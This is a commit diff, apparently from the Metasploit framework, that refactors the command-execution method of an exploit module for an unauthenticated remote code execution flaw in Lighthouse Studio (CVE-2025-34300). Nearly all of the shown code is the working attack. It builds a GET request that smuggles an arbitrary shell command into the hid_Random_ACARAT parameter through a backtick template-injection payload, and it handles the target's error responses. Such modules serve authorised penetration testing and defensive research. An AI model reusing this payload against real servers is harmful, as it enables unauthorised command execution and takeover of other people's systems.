Execute Method Refactoring

vognik · vognik · commit e90396a15fad · 2025-07-21T13:59:43.000+04:00
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
@@ -134,27 +134,27 @@ def check
 
   def execute_command(cmd, _opts = {})
     cmd = Rex::Text.uri_encode(cmd, 'hex-all')
+
     query = [
       'hid_javascript=1',
       "hid_Random_ACARAT=[%`#{cmd}`%]",
       "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
-    ].join('&')
+    ]
 
-    if datastore['STUDYNAME']
-      query << "&hid_studyname=#{datastore['STUDYNAME']}"
-    end
+    query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty?
+    query_string = query.join('&')
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path),
       'method' => 'GET',
-      'query' => query
+      'query' => query_string
     })
 
-    if res
-      html = res.get_html_document
-      if html && html.text.include?('Sawtooth Error # 129')
-        return fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
-      end
+    fail_with(Failure::Unreachable, 'No response from target') unless res
+
+    html = res.get_html_document
+    if html&.text&.include?('Sawtooth Error # 129')
+      fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
     end
   end
 
